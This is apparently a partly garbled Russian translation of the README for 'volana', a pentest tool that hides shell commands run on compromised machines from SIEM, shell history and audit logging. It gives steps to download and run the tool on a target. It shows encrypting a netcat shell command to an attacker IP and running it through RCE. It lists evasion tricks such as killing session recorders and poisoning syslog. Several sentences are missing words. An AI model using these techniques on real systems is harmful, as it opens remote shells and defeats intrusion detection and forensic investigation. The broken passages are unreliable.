
🌒 Обфускация команд оболочки для обхода систем обнаружения
Во время пентеста важным аспектом является . По этой причине следует . Тем не менее, многие инфраструктуры логируют команды и отправляют их в SIEM в реальном времени, что делает последующую чистку по отдельности бесполезной. предоставляет простой способ скрыть команды, выполняемые на скомпрометированной машине, предоставляя собственную среду выполнения оболочки (введите команду, volana выполнит её за вас). Таким образом, вы
volanaВам нужно получить интерактивную оболочку. (Найдите способ её запустить, вы хакер, это ваша работа! иначе). Затем загрузите её на целевую машину и запустите. Всё, теперь вы можете вводить команду, которую хотите выполнить скрытно.
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
Команды консоли volana:
ring: включить режим ring, т.е. каждая команда запускается вместе с множеством других для заметания следов (от решений, которые мониторят системные вызовы)exit: выход из консоли volanaПредставьте, что у вас неинтерактивная оболочка (веб-шелл или слепая RCE), вы можете использовать подкоманды encrypt и decrypt.
Предварительно необходимо собрать volana со встроенным ключом шифрования.
На машине атакующего
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Скопируйте зашифрованную команду и выполните её с помощью вашей RCE на целевой машине
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Почему бы просто не спрятать команду с помощью echo [command] | base64 ? И декодировать на цели с помощью echo [encoded_command] | base64 -d | bash
Потому что мы хотим быть защищёнными от систем, которые срабатывают на использование base64 или ищут текст base64 в команде. Также мы хотим затруднить расследование, а base64 не является настоящим препятствием.
Помните, что volana — это не чудо, которое сделает вас полностью невидимым. Его цель — усложнить обнаружение вторжений и расследование.
Под "обнаружено" мы подразумеваем возможность вызвать срабатывание сигнала тревоги при выполнении определённой команды.
Будет зафиксирована только строка запуска volana. 🧠 Однако, если перед её выполнением добавить пробел, то поведение bash по умолчанию не сохраняет её.
history.bash_history, ".zsh_history" и т.д.opensnoop)script, screen -L, sexonthebash, ovh-ttyrec и т.д.)
pkill -9 scriptscreen немного сложнее избежать, однако он не регистрирует ввод (секретный ввод: stty -echo => избежать)volana с шифрованием/var/log/auth.log)
sudo или sulogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD для ведения логов
Извините за кликбейтный заголовок, но никаких денег контрибьюторам не предусмотрено. 🐛
Сообщите, если вы нашли:
volanavolana